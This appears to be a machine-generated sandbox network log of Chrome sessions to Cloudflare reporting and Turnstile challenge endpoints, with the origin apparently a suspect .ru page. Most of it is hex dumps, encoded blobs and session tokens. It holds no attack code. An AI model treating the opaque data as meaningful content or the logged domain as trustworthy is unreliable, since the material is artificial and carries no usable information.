                                                                                        2024-12-18 01:10:36 UTC602INData Raw: 6f 6e 37 45 77 4a 65 33 68 5a 79 57 79 36 36 38 6f 4b 36 53 30 61 79 4d 79 61 75 31 79 39 57 6d 78 4a 4f 5a 6e 62 75 74 6d 74 6d 36 77 4e 6e 53 74 38 57 71 78 72 66 72 75 72 71 6d 38 4d 4c 71 33 38 7a 78 78 38 4b 76 74 63 54 4c 31 2f 54 7a 74 72 6a 68 75 64 44 66 42 51 48 61 30 39 50 36 31 73 55 46 2b 4f 54 2b 30 4e 4c 66 79 77 33 75 79 67 6a 35 7a 65 62 33 31 42 55 61 33 52 38 64 45 75 41 42 49 52 62 6a 49 74 30 6c 35 79 73 4b 4a 43 6b 76 36 76 48 31 38 44 4c 79 2b 53 51 31 4c 54 6e 30 49 54 62 2b 39 42 73 31 41 55 62 39 4f 51 55 49 4b 54 6b 36 47 77 59 70 48 42 41 73 48 79 6f 2f 49 30 31 49 55 68 59 76 4f 6b 41 38 4f 6d 46 4d 49 44 56 56 55 56 41 36 52 45 4e 4c 4f 47 31 70 57 6b 5a 76 62 46 35 71 56 54 5a 32 52 31 70 6f 57 30 74 34 50 44 39 64 64 49 4a
                                                                                        Data Ascii: on7EwJe3hZyWy668oK6S0ayMyau1y9WmxJOZnbutmtm6wNnSt8Wqxrfrurqm8MLq38zxx8KvtcTL1/TztrjhudDfBQHa09P61sUF+OT+0NLfyw3uygj5zeb31BUa3R8dEuABIRbjIt0l5ysKJCkv6vH18DLy+SQ1LTn0ITb+9Bs1AUb9OQUIKTk6GwYpHBAsHyo/I01IUhYvOkA8OmFMIDVVUVA6RENLOG1pWkZvbF5qVTZ2R1poW0t4PD9ddIJ
                                                                                        2024-12-18 01:10:36 UTC1369INData Raw: 42 55 65 6c 68 56 57 56 32 48 67 47 69 42 68 56 52 53 55 31 68 4c 6c 4a 42 6f 6b 46 36 67 65 34 2b 64 6d 70 68 7a 6b 6d 4b 43 68 71 47 67 6f 32 4f 63 67 59 71 49 70 71 31 30 68 49 4f 59 6a 71 79 58 72 70 75 5a 64 58 6c 79 72 4c 6d 59 73 61 62 44 70 62 43 55 67 59 61 72 6f 73 2b 34 6d 36 6d 72 6a 64 48 42 31 4a 4c 5a 6f 39 69 35 7a 71 36 63 77 4e 4c 55 33 70 75 66 6f 38 58 58 78 4d 48 58 71 63 6a 4e 79 71 79 74 36 61 2f 54 70 75 61 73 31 64 58 55 32 76 76 61 38 50 48 74 38 63 2f 2b 41 4e 4c 37 33 64 59 46 36 4c 7a 43 39 73 7a 6b 45 65 33 52 36 2f 37 75 35 67 50 6f 45 52 51 53 2f 41 67 49 48 39 33 79 39 74 7a 33 45 66 76 32 48 74 37 78 2b 2f 77 57 2b 78 38 66 4a 43 67 6f 2b 7a 50 6e 4d 54 55 30 45 69 34 46 4e 50 62 33 4d 79 72 38 4e 41 34 6d 51 67 39 41 50
                                                                                        Data Ascii: BUelhVWV2HgGiBhVRSU1hLlJBokF6ge4+dmphzkmKChqGgo2OcgYqIpq10hIOYjqyXrpuZdXlyrLmYsabDpbCUgYaros+4m6mrjdHB1JLZo9i5zq6cwNLU3pufo8XXxMHXqcjNyqyt6a/Tpuas1dXU2vva8PHt8c/+ANL73dYF6LzC9szkEe3R6/7u5gPoERQS/AgIH93y9tz3Efv2Ht7x+/wW+x8fJCgo+zPnMTU0Ei4FNPb3Myr8NA4mQg9AP
                                                                                        2024-12-18 01:10:36 UTC1369INData Raw: 68 53 6e 46 6a 58 6b 65 58 61 33 4e 30 55 35 5a 5a 66 6d 2b 65 56 34 32 42 65 36 53 59 5a 6f 42 78 6c 49 70 71 6d 48 70 6e 5a 34 39 78 6f 4c 4f 7a 71 4c 4a 78 6a 4b 53 4b 64 6f 2b 4b 6a 48 6d 31 6b 6f 75 30 67 37 53 76 68 35 7a 49 74 5a 65 59 70 4d 2f 48 79 4d 71 61 78 73 65 6c 6b 5a 47 54 31 73 61 4e 75 4c 6e 5a 79 62 47 38 6f 73 4f 7a 72 63 58 6d 79 4d 6a 58 35 36 54 42 71 71 6e 6e 72 37 2b 71 36 4c 44 57 7a 2f 4c 76 34 38 66 33 37 4d 62 58 2b 76 4c 76 33 77 44 35 2f 50 55 44 2f 41 66 30 36 51 6b 51 43 2b 50 71 7a 4e 4d 51 42 51 50 30 42 65 59 57 32 68 49 65 47 74 2f 36 34 42 63 62 2f 41 58 76 33 69 72 39 48 77 48 33 48 75 63 5a 44 7a 49 75 4a 51 63 77 4b 51 7a 31 39 6a 73 51 39 66 4d 74 4b 52 51 74 51 69 37 36 46 44 67 43 4e 55 68 43 4e 53 63 33 51 67
                                                                                        Data Ascii: hSnFjXkeXa3N0U5ZZfm+eV42Be6SYZoBxlIpqmHpnZ49xoLOzqLJxjKSKdo+KjHm1kou0g7Svh5zItZeYpM/HyMqaxselkZGT1saNuLnZybG8osOzrcXmyMjX56TBqqnnr7+q6LDWz/Lv48f37MbX+vLv3wD5/PUD/Af06QkQC+PqzNMQBQP0BeYW2hIeGt/64Bcb/AXv3ir9HwH3HucZDzIuJQcwKQz19jsQ9fMtKRQtQi76FDgCNUhCNSc3Qg
                                                                                        2024-12-18 01:10:36 UTC1369INData Raw: 68 48 61 53 59 32 64 54 6e 6f 70 66 66 48 53 61 6e 31 36 41 6b 49 46 32 70 57 5a 6d 6e 71 4b 65 61 4b 52 77 62 35 4f 66 6b 33 43 78 65 4b 57 44 71 4a 52 33 6a 72 79 55 65 35 4b 72 6a 49 36 78 77 4c 4f 71 6c 61 58 4d 6f 4a 61 34 72 4d 66 54 31 4b 47 6c 6f 4b 4b 34 6c 71 50 61 6c 4c 36 77 33 72 54 62 77 38 43 62 35 4d 62 46 71 4c 66 4c 6f 73 33 4c 74 75 4b 77 34 39 2b 73 72 50 44 33 74 4b 72 4b 30 63 54 45 32 76 66 79 38 63 34 45 2f 4c 7a 5a 76 38 66 2b 2b 63 48 33 37 65 48 57 36 41 7a 6f 33 74 30 45 42 65 51 55 42 64 6b 48 45 68 73 4a 43 42 50 63 48 50 6a 2b 4a 43 63 50 42 42 76 37 46 41 4d 69 4b 2f 6b 76 2b 4f 67 51 42 52 55 46 36 41 4d 61 4e 67 59 58 47 44 63 30 2f 43 49 65 2f 67 41 39 39 78 55 6c 49 54 67 37 52 68 30 41 44 7a 46 52 44 54 30 64 54 43 51
                                                                                        Data Ascii: hHaSY2dTnopffHSan16AkIF2pWZmnqKeaKRwb5Ofk3CxeKWDqJR3jryUe5KrjI6xwLOqlaXMoJa4rMfT1KGloKK4lqPalL6w3rTbw8Cb5MbFqLfLos3LtuKw49+srPD3tKrK0cTE2vfy8c4E/LzZv8f++cH37eHW6Azo3t0EBeQUBdkHEhsJCBPcHPj+JCcPBBv7FAMiK/kv+OgQBRUF6AMaNgYXGDc0/CIe/gA99xUlITg7Rh0ADzFRDT0dTCQ
                                                                                        2024-12-18 01:10:36 UTC1369INData Raw: 59 6c 6f 65 6e 57 41 6f 4a 4b 56 63 32 47 46 6f 70 35 37 6e 71 5a 67 6f 58 43 61 67 61 71 43 71 47 35 7a 6f 70 43 4d 69 62 61 39 6d 58 69 2b 65 4a 43 32 74 34 4f 77 77 70 4f 53 75 6f 65 6f 6e 6f 62 41 79 63 75 4d 78 34 36 72 6a 71 4c 43 72 38 32 6d 71 35 4f 33 74 74 4f 67 32 74 2b 77 72 36 44 54 6d 75 6a 72 35 75 54 6a 71 75 7a 4b 72 4d 48 6b 38 2b 6e 73 71 65 33 32 79 66 79 35 79 4e 79 34 74 73 37 34 41 37 7a 30 76 4d 66 6b 33 50 32 39 78 75 6a 76 41 65 38 4c 36 65 76 4f 46 2b 2f 67 39 65 7a 54 32 4e 58 34 37 42 58 38 47 78 45 4f 33 53 66 6d 33 77 66 38 2b 77 72 6b 43 65 67 44 44 69 73 78 37 75 77 33 37 53 38 59 44 53 4d 56 4d 42 77 4b 2b 52 41 76 47 77 45 52 4f 42 4d 31 2b 76 73 58 47 6a 68 4e 49 78 77 5a 48 79 64 54 52 7a 4e 42 46 53 68 58 4d 31 73 73
                                                                                        Data Ascii: YloenWAoJKVc2GFop57nqZgoXCagaqCqG5zopCMiba9mXi+eJC2t4OwwpOSuoeonobAycuMx46rjqLCr82mq5O3ttOg2t+wr6DTmujr5uTjquzKrMHk8+nsqe32yfy5yNy4ts74A7z0vMfk3P29xujvAe8L6evOF+/g9ezT2NX47BX8GxEO3Sfm3wf8+wrkCegDDisx7uw37S8YDSMVMBwK+RAvGwEROBM1+vsXGjhNIxwZHydTRzNBFShXM1ss
                                                                                        2024-12-18 01:10:36 UTC1369INData Raw: 4e 76 64 6e 43 69 6e 58 79 47 71 6f 74 2b 6f 32 32 41 61 49 78 38 64 59 69 32 6c 33 57 79 68 4a 57 76 64 4a 4a 2b 66 34 75 53 74 59 4b 50 74 35 47 7a 73 38 43 68 6e 71 6e 42 76 70 36 38 6f 4b 4b 30 6c 5a 61 6e 72 73 76 49 70 36 72 64 72 4d 36 78 74 5a 7a 68 33 4b 2b 6b 31 36 6e 68 31 75 57 6d 70 4c 79 39 36 38 33 6c 7a 75 54 52 36 62 58 46 74 75 54 37 79 73 66 2b 32 67 48 35 41 39 54 52 33 2b 54 39 32 63 58 6e 39 76 33 4f 43 77 6e 50 2f 75 4d 56 44 63 6a 4e 42 2b 54 5a 42 76 50 79 37 77 45 4b 39 2b 6f 57 42 68 59 50 2f 53 45 53 49 2f 73 70 44 43 49 43 4d 65 63 4e 4d 69 4d 46 44 7a 63 6a 44 76 45 34 37 69 59 73 4e 78 73 50 2b 6a 34 67 49 41 41 49 53 69 74 46 2f 55 31 4f 4a 43 55 78 43 79 38 73 56 68 55 6d 49 6a 56 4a 4f 30 74 54 46 69 34 31 55 79 45 36 4f
                                                                                        Data Ascii: NvdnCinXyGqot+o22AaIx8dYi2l3WyhJWvdJJ+f4uStYKPt5Gzs8ChnqnBvp68oKK0lZanrsvIp6rdrM6xtZzh3K+k16nh1uWmpLy9683lzuTR6bXFtuT7ysf+2gH5A9TR3+T92cXn9v3OCwnP/uMVDcjNB+TZBvPy7wEK9+oWBhYP/SESI/spDCICMecNMiMFDzcjDvE47iYsNxsP+j4gIAAISitF/U1OJCUxCy8sVhUmIjVJO0tTFi41UyE6O
                                                                                        2024-12-18 01:10:36 UTC1369INData Raw: 6d 69 56 2b 73 61 34 70 38 70 71 75 47 6e 61 71 4b 6a 72 57 31 75 72 4b 52 6d 4b 36 53 76 72 47 74 6b 36 48 46 71 4b 6d 44 77 34 66 45 71 38 65 4e 72 72 76 47 75 36 57 53 74 62 43 50 72 35 4c 46 78 61 33 4f 33 4c 2b 71 32 64 58 54 74 72 50 45 33 37 79 68 75 4b 69 6e 72 75 4c 70 79 74 36 37 39 4f 65 30 37 63 6a 71 32 73 2f 56 37 64 4c 75 77 50 58 4c 31 73 7a 68 78 51 58 36 42 41 50 61 36 64 76 39 45 50 44 52 43 4e 76 55 44 76 37 56 79 76 6f 4c 35 51 2f 50 33 4e 66 73 46 51 44 36 2b 75 2f 79 35 66 6a 39 4a 53 6a 71 47 65 6b 70 36 76 34 76 42 2f 49 46 4c 52 4d 79 2b 51 73 38 38 69 73 34 2f 52 63 4e 4d 69 55 74 4c 7a 6b 43 53 55 6f 39 47 30 6b 6f 50 6a 45 62 4d 45 4d 31 56 52 39 45 4f 44 63 78 54 78 6b 54 56 78 6b 31 45 79 46 69 4e 31 6b 6b 5a 32 41 78 4a 7a
                                                                                        Data Ascii: miV+sa4p8pquGnaqKjrW1urKRmK6SvrGtk6HFqKmDw4fEq8eNrrvGu6WStbCPr5LFxa3O3L+q2dXTtrPE37yhuKinruLpyt679Oe07cjq2s/V7dLuwPXL1szhxQX6BAPa6dv9EPDRCNvUDv7VyvoL5Q/P3NfsFQD6+u/y5fj9JSjqGekp6v4vB/IFLRMy+Qs88is4/RcNMiUtLzkCSUo9G0koPjEbMEM1VR9EODcxTxkTVxk1EyFiN1kkZ2AxJz
                                                                                        2024-12-18 01:10:36 UTC1369INData Raw: 72 4b 57 4c 74 70 47 6f 6c 4a 69 54 6e 4c 4b 54 63 4b 78 34 6a 62 36 30 76 38 50 46 6e 72 65 58 70 36 6d 33 79 37 61 75 6f 62 36 36 30 63 66 46 72 4d 53 53 70 38 6d 59 74 4c 58 54 74 4e 32 72 7a 4e 36 74 78 72 4c 59 34 39 76 42 77 71 7a 44 33 71 76 6c 33 65 2f 6c 34 39 58 70 36 75 69 31 36 76 44 73 39 50 50 4f 76 4c 36 2f 37 65 44 33 35 75 50 6c 33 41 48 32 43 67 73 4d 43 67 58 51 45 2b 66 47 31 4d 30 43 30 76 45 62 32 68 45 63 37 39 55 62 33 41 45 61 33 76 6f 6b 37 2b 55 53 33 50 51 46 41 43 48 68 2b 7a 48 79 36 68 30 65 47 42 49 4a 43 41 59 4e 50 6a 72 35 4f 6a 33 38 52 43 30 36 45 45 67 79 45 77 6c 4a 4e 51 6f 4a 52 53 74 45 51 43 55 75 43 30 56 51 46 53 49 61 53 6a 73 56 48 46 45 77 56 6b 77 77 59 6a 59 32 56 46 34 37 51 69 45 38 54 44 31 72 58 79 77
                                                                                        Data Ascii: rKWLtpGolJiTnLKTcKx4jb60v8PFnreXp6m3y7auob660cfFrMSSp8mYtLXTtN2rzN6txrLY49vBwqzD3qvl3e/l49Xp6ui16vDs9PPOvL6/7eD35uPl3AH2CgsMCgXQE+fG1M0C0vEb2hEc79Ub3AEa3vok7+US3PQFACHh+zHy6h0eGBIJCAYNPjr5Oj38RC06EEgyEwlJNQoJRStEQCUuC0VQFSIaSjsVHFEwVkwwYjY2VF47QiE8TD1rXyw
                                                                                        2024-12-18 01:10:36 UTC1369INData Raw: 49 53 70 75 71 74 32 6d 49 32 7a 6a 37 75 50 77 35 6a 47 72 37 79 67 74 4c 71 48 77 36 72 4f 6d 38 61 6f 72 36 75 7a 79 72 2f 53 7a 5a 66 57 6e 4e 69 30 74 37 79 79 6c 4a 75 74 33 4d 43 5a 31 72 4b 6b 6e 62 6e 57 6f 4b 32 6f 30 4e 50 50 33 37 57 30 74 73 37 50 2b 50 62 56 30 64 47 39 37 50 53 2b 2f 50 76 36 41 4c 30 41 43 65 6a 46 32 41 37 5a 33 64 72 74 43 38 55 46 41 66 55 4b 2b 4f 50 6d 32 2f 48 61 46 76 4d 52 44 42 48 69 34 67 51 63 2f 53 6f 54 34 78 6a 37 39 75 6a 76 37 51 49 53 41 6a 48 6e 4c 54 41 4a 39 41 55 45 47 51 6b 52 51 50 63 55 46 78 78 44 51 2f 67 51 51 68 6f 64 43 79 41 59 48 30 49 65 4d 69 41 4f 4b 6b 56 4a 4d 52 6c 57 44 54 64 51 55 43 67 64 55 54 6f 62 4c 56 51 77 50 30 41 36 5a 32 64 6a 61 79 70 45 4f 44 74 71 4c 6d 38 78 55 79 31 42
                                                                                        Data Ascii: ISpuqt2mI2zj7uPw5jGr7ygtLqHw6rOm8aor6uzyr/SzZfWnNi0t7yylJut3MCZ1rKknbnWoK2o0NPP37W0ts7P+PbV0dG97PS+/Pv6AL0ACejF2A7Z3drtC8UFAfUK+OPm2/HaFvMRDBHi4gQc/SoT4xj79ujv7QISAjHnLTAJ9AUEGQkRQPcUFxxDQ/gQQhodCyAYH0IeMiAOKkVJMRlWDTdQUCgdUTobLVQwP0A6Z2djaypEODtqLm8xUy1B


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.2.164973835.190.80.14436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:36 UTC541OUTOPTIONS /report/v4?s=98Y9vMEODaOr0vyIkJLQCSB%2F%2Fc4eQE%2BgeiJuNcrNJXdrZeHD%2FSGiWJR4bhp72jqXe9EDeOJGNED1VzeSsnvvyPU5LqC9%2F%2FLKxqb8D7hQN4I7Sya2Gc1ycrL9iPVe5A%3D%3D HTTP/1.1
                                                                                        Host: a.nel.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Origin: https://dva.dgkifyron.ru
                                                                                        Access-Control-Request-Method: POST
                                                                                        Access-Control-Request-Headers: content-type
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:36 UTC336INHTTP/1.1 200 OK
                                                                                        Content-Length: 0
                                                                                        access-control-max-age: 86400
                                                                                        access-control-allow-methods: OPTIONS, POST
                                                                                        access-control-allow-origin: *
                                                                                        access-control-allow-headers: content-type, content-length
                                                                                        date: Wed, 18 Dec 2024 01:10:36 GMT
                                                                                        Via: 1.1 google
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        20192.168.2.164973935.190.80.14436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:37 UTC482OUTPOST /report/v4?s=98Y9vMEODaOr0vyIkJLQCSB%2F%2Fc4eQE%2BgeiJuNcrNJXdrZeHD%2FSGiWJR4bhp72jqXe9EDeOJGNED1VzeSsnvvyPU5LqC9%2F%2FLKxqb8D7hQN4I7Sya2Gc1ycrL9iPVe5A%3D%3D HTTP/1.1
                                                                                        Host: a.nel.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 427
                                                                                        Content-Type: application/reports+json
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:37 UTC427OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 34 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 64 76 61 2e 64 67 6b 69 66 79 72 6f 6e 2e 72 75 2f 6e 63 6e 36 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 32 31 34 2e 39 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22
                                                                                        Data Ascii: [{"age":0,"body":{"elapsed_time":342,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://dva.dgkifyron.ru/ncn6/","sampling_fraction":1.0,"server_ip":"172.67.214.93","status_code":404,"type":"http.error"},"type":"network-error","
                                                                                        2024-12-18 01:10:38 UTC168INHTTP/1.1 200 OK
                                                                                        Content-Length: 0
                                                                                        date: Wed, 18 Dec 2024 01:10:37 GMT
                                                                                        Via: 1.1 google
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        21192.168.2.1649740104.18.94.414436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:38 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/125857172:1734480993:OfdE6imy-GzCLV7tV1vzGVc07L0hYO19BOItnccvC5w/8f3b461238074211/ExOb.daxNHAiJT.h1RRGTEKuoCP8liHdCaZ3eIW.bag-1734484232-1.1.1.1-qNIWgYzRApq.Sk3W21WkBZVcC7C5o16q8dSHr6PvGPvTVg8.BgAUf19yvKbZUdM5 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:38 UTC379INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 18 Dec 2024 01:10:38 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 7
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        cf-chl-out: E8QRDDf2MIg8brg5KDfI4eX8Dckdk1K9xPY=$OiJKiJaaRAQq/VFB
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f3b463adf15438e-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-18 01:10:38 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                        Data Ascii: invalid


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        22192.168.2.1649741104.18.95.414436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:38 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8f3b461238074211/1734484236191/3d49fbda9781759e22ef658622937e3dc0dc5a7ee0fc517e38e5eca96346b40f/tXmkPobUkDYfmwy HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: max-age=0
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/i61ws/0x4AAAAAAA0qv3MB2HiD-Mp6/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:39 UTC143INHTTP/1.1 401 Unauthorized
                                                                                        Date: Wed, 18 Dec 2024 01:10:38 GMT
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Content-Length: 1
                                                                                        Connection: close
                                                                                        2024-12-18 01:10:39 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 50 55 6e 37 32 70 65 42 64 5a 34 69 37 32 57 47 49 70 4e 2d 50 63 44 63 57 6e 37 67 5f 46 46 2d 4f 4f 58 73 71 57 4e 47 74 41 38 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gPUn72peBdZ4i72WGIpN-PcDcWn7g_FF-OOXsqWNGtA8AGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                        2024-12-18 01:10:39 UTC1INData Raw: 4a
                                                                                        Data Ascii: J


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        23192.168.2.1649742104.18.95.414436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:40 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8f3b461238074211/1734484236191/2ItuRd0ocevcQB0 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/i61ws/0x4AAAAAAA0qv3MB2HiD-Mp6/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:40 UTC200INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 01:10:40 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f3b46477e6d7c9f-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-18 01:10:40 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4c 00 00 00 63 08 02 00 00 00 be 0f 71 9f 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDRLcqIDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        24192.168.2.1649743104.18.94.414436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:41 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8f3b461238074211/1734484236191/2ItuRd0ocevcQB0 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:42 UTC200INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 01:10:42 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f3b4651ebc241e6-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-18 01:10:42 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4c 00 00 00 63 08 02 00 00 00 be 0f 71 9f 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDRLcqIDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        25192.168.2.1649744104.18.95.414436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:42 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/125857172:1734480993:OfdE6imy-GzCLV7tV1vzGVc07L0hYO19BOItnccvC5w/8f3b461238074211/ExOb.daxNHAiJT.h1RRGTEKuoCP8liHdCaZ3eIW.bag-1734484232-1.1.1.1-qNIWgYzRApq.Sk3W21WkBZVcC7C5o16q8dSHr6PvGPvTVg8.BgAUf19yvKbZUdM5 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 32025
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        Content-type: application/x-www-form-urlencoded
